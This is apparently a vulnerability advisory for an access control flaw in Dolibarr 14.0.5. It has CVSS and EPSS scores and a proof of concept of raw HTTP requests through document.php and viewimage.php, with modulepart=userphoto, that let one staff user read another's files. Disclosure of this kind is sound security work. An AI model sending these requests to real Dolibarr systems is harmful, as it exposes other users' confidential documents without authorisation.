6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
25.9%
Dolibarr v14.0.5 allows improper access control issues in the userphoto modulepart. The impact could lead to data exposure as the attached files and documents may contain sensitive information of relevant parties such as contacts, suppliers, invoices, orders, stocks, agenda, accounting and more.
**** Scenario: Staff_2 is trying to request property of Staff_3
Tampered Request: in modulepart=user
GET /dolibarr/document.php?modulepart=user&entity=1&file=3/fileuser3.txt HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}
Expected Response:
Access denied. You try to access to a page, area or feature of a disabled module or without being in an authenticated session or that is not allowed to your user.
Current login: staff_2
Permission for this login can be defined by your Dolibarr administrator from menu Home->Users.
<SNIP><SNIP>
Tampered Request: using modulepart=userphoto
GET /dolibarr/document.php?modulepart=userphoto&attachment=0&file=3/fileuser3.txt&entity=1 HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}
Tampered Response:
**Staff 3 file content return**
<SNIP><SNIP>
Tampered Request: using modulepart=userphoto
GET /dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=3/fileuser3.txt&cache=0 HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}
Tampered Response:
**Staff 3 file content return**
This vulnerability is capable of downloading or reading any file types such as pdf, zip, txt, jpg and more thus leading to sensitive information exposure of relevant parties.
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
25.9%